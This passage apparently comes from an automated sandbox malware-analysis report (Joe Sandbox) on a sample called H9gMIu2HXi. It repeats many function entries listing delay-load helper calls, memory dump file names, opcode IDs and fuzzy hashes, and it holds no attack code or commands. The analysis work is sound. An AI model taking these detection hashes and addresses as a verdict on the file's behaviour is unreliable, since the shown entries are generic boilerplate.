                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc666e17e48fbac209d14d1ce93777856b47dbc7d7a9fa05bf1134d5bb000e6c
                                                                                              • Instruction ID: 523889e9584d26b615c37ff51372bb8e23a697fbd72eda1db2a5b0c756788287
                                                                                              • Opcode Fuzzy Hash: fc666e17e48fbac209d14d1ce93777856b47dbc7d7a9fa05bf1134d5bb000e6c
                                                                                              • Instruction Fuzzy Hash: D6B01291A791027D3294B1242D07F36022CD4D0B117308A3FFC10C4140D4500C491331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F396 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: edbe8f2c5118a9e737519e0e44c71e06ab5b1299d365d6512f119ac90e156e10
                                                                                              • Instruction ID: 266b0e0a9774755d34c07f70f5eb808603949773485243a9b12e1886d720c06a
                                                                                              • Opcode Fuzzy Hash: edbe8f2c5118a9e737519e0e44c71e06ab5b1299d365d6512f119ac90e156e10
                                                                                              • Instruction Fuzzy Hash: 04B01295A790027D3254B1242E07F36022CE4D0B11730893FFC00C8140D4A00C0E1231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 98d9f3799e98c2e81d6a57c573d4a317a66cd77d33a3f8b061ebe670ab885e1d
                                                                                              • Instruction ID: 9f0d6510c58bf74b6c75b209da1f2c1838780654f026e1a788f06bc7b3824ec3
                                                                                              • Opcode Fuzzy Hash: 98d9f3799e98c2e81d6a57c573d4a317a66cd77d33a3f8b061ebe670ab885e1d
                                                                                              • Instruction Fuzzy Hash: 19B012A1A790027D3254B1252D07F36022CF4D0F11730593FFC00C8040D4400C051231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3DC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: afbc908f5e841ebacfb0c8beecd4518608192607b38bc10fd07c165a5c846056
                                                                                              • Instruction ID: 7d2d955943d46844889a90dc5fb589c95c0c07c8f16ee80812e261726f20c658
                                                                                              • Opcode Fuzzy Hash: afbc908f5e841ebacfb0c8beecd4518608192607b38bc10fd07c165a5c846056
                                                                                              • Instruction Fuzzy Hash: 33B012A1A7B1027D3294B2246D17F36022CD4D0B11B304A3FFC00C4040D4400C451331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F32B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9b9fc804c0562afebc2a17cdcbb5140b2c502818aa079952b5cf32cc3e6ca0a8
                                                                                              • Instruction ID: a9d33ee85d683da6bb23ac6dd8399129b39316b7c91efc114d909c03d50dab02
                                                                                              • Opcode Fuzzy Hash: 9b9fc804c0562afebc2a17cdcbb5140b2c502818aa079952b5cf32cc3e6ca0a8
                                                                                              • Instruction Fuzzy Hash: 05B01291A790037E322875202D0BE36022CE4E0F11730493FFC00C4040E4400C051131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F364 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 912c1afa9fba55613e10f9c26b67549a539f0784eaa94a33bcd73dc4132edf44
                                                                                              • Instruction ID: 1abcbee164b700ed6ef3d5319dcca0ce5e5daf0daf038876e3de6bbb637315bf
                                                                                              • Opcode Fuzzy Hash: 912c1afa9fba55613e10f9c26b67549a539f0784eaa94a33bcd73dc4132edf44
                                                                                              • Instruction Fuzzy Hash: 80B012A5A792027D3694B1242D07F3702ACD8D0B117304A3FFC00C4040E4400C455331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F378 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 740e2d890141abad6ebe57592dbd2cc712fe26fa10b43c57b89c3815b8d909b2
                                                                                              • Instruction ID: d1bdd6e1e09e772261a8bfb1c8542b11be937279992f95414bfda2730a1e5b4e
                                                                                              • Opcode Fuzzy Hash: 740e2d890141abad6ebe57592dbd2cc712fe26fa10b43c57b89c3815b8d909b2
                                                                                              • Instruction Fuzzy Hash: 58B012A5A791027D7254B1242D07F37026CE8D0F11730493FFC00C4040D4400C051331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F346 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 147a7a53e2614db5a5d9ed32a9dcbc52a5b65a32fa99440bcf6b740010c48c3b
                                                                                              • Instruction ID: cad2af8a5dacbd0ad9d26d8a6fa9814bcc4f71330a2af7fce358efa203c9130d
                                                                                              • Opcode Fuzzy Hash: 147a7a53e2614db5a5d9ed32a9dcbc52a5b65a32fa99440bcf6b740010c48c3b
                                                                                              • Instruction Fuzzy Hash: FEB01295A790027D3254B1686E07F36023CD4D0B117304B3FFC00C8044D4800C061231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F350 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8fddc8d45460cdf68d243ed7af9001dea104fd277ac774bc309b97ce04f7796b
                                                                                              • Instruction ID: 165f5fea5467294b45e70b264db455b6f68c7400547c62cd8de67da2002a3196
                                                                                              • Opcode Fuzzy Hash: 8fddc8d45460cdf68d243ed7af9001dea104fd277ac774bc309b97ce04f7796b
                                                                                              • Instruction Fuzzy Hash: C6B01291A791027D3254B1286D07F36023CE4D0F117304A3FFC00C4044D4400C051631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F35A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 55496b9e3abcf08bf9617816ea7efd990b35d9a682df3fe851ae489e3b277e04
                                                                                              • Instruction ID: efc9d3077fd7331e6926208ab21688ad0b559ae59ed52be296f929fa55b7d23d
                                                                                              • Opcode Fuzzy Hash: 55496b9e3abcf08bf9617816ea7efd990b35d9a682df3fe851ae489e3b277e04
                                                                                              • Instruction Fuzzy Hash: 08B012A5A791027D3254B1242D07F3B026CD8D0B11730893FFC00C4040D4400C051231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F5A5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1b258c2b8169bea4358f8928402f37a1455e4ed5083e47c91383e56c0f68575c
                                                                                              • Instruction ID: cebed095ed3859ccf5b10c763fcc83e6021f136a1472c5b55f8f84fa4b713af5
                                                                                              • Opcode Fuzzy Hash: 1b258c2b8169bea4358f8928402f37a1455e4ed5083e47c91383e56c0f68575c
                                                                                              • Instruction Fuzzy Hash: 14B012D1AF80007F321462247D13F36012CE0C4B12730463BF840C1040D4414C040231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F573 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b7567cc5db8489acbea69002499f96c5576194009762eb8a0ac85421f6d31cd1
                                                                                              • Instruction ID: 6f601e0d598438d24b0ef228807c6dc040fd30db1d82208c67cad89121fa356f
                                                                                              • Opcode Fuzzy Hash: b7567cc5db8489acbea69002499f96c5576194009762eb8a0ac85421f6d31cd1
                                                                                              • Instruction Fuzzy Hash: B5B012E1AF83007F331462243D03E3601ACD8C4B11730453AF840C1040E4404C481231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F57D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7d05a63508c51ed830cb800c5a4845436eac713ae1bb436f1f1265153e4d9bf5
                                                                                              • Instruction ID: 7592009e8dac25db462c363974b34adf8eacc28e33c8463c3634c06e3108e1cc
                                                                                              • Opcode Fuzzy Hash: 7d05a63508c51ed830cb800c5a4845436eac713ae1bb436f1f1265153e4d9bf5
                                                                                              • Instruction Fuzzy Hash: E7B012E1AF82007F721462243D13F36016CE4C4B11730443AF840C1040D4404C040331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d576140eb50f140499341afa368266e2df90f814b27a0f35c26607aad03130ec
                                                                                              • Instruction ID: 67324f45a305b92e74346bb099ecf0e0c4a483742a9698ea5bd43a9a75fa9f7f
                                                                                              • Opcode Fuzzy Hash: d576140eb50f140499341afa368266e2df90f814b27a0f35c26607aad03130ec
                                                                                              • Instruction Fuzzy Hash: 0AB012D1A781007D331471342D03E36016CD4C4B15730453BFC00C0184D4410C4C2331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
